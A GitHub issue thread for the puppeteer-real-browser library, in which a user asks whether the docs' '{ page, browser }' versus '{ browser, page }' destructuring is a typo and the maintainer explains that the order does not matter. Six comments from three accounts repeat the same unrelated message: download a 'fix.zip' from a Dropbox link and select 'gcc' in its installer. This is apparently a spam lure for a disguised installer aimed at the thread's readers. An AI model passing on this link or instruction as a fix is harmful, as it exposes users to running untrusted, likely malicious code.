### ISSUE TITLE
Typo in the docs? page, browser OR browser, page?

### ISSUE THREAD

**Issue by aguyinmontreal** [zfcsoftware/puppeteer-real-browser#143]
Include
CommonJS
const { connect } = require('puppeteer-real-browser');

const start = async () => {
    const { **page, browser** } = await connect({})
}
Module
import { connect } from 'puppeteer-real-browser'

const { **page, browser** } = await connect({})
Usage
const { connect } = require("puppeteer-real-browser")

async function test() {

const { **browser, page** } = await connect({

headless: false,

args: [],

customConfig: {},

turnstile: true,

connectOption: {},

disableXvfb: false,

// proxy:{
//     host:'<proxy-host>',
//     port:'<proxy-port>',
//     username:'<proxy-username>',
//     password:'<proxy-password>'
// }

})
await page.goto('<url>')

}

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by zfcsoftware** [comment]
Since the return is json, it doesn't matter which order you write it in, you can use it both ways.

**Comment by aguyinmontreal** [comment]
@zfcsoftware sorry, I'm very tired
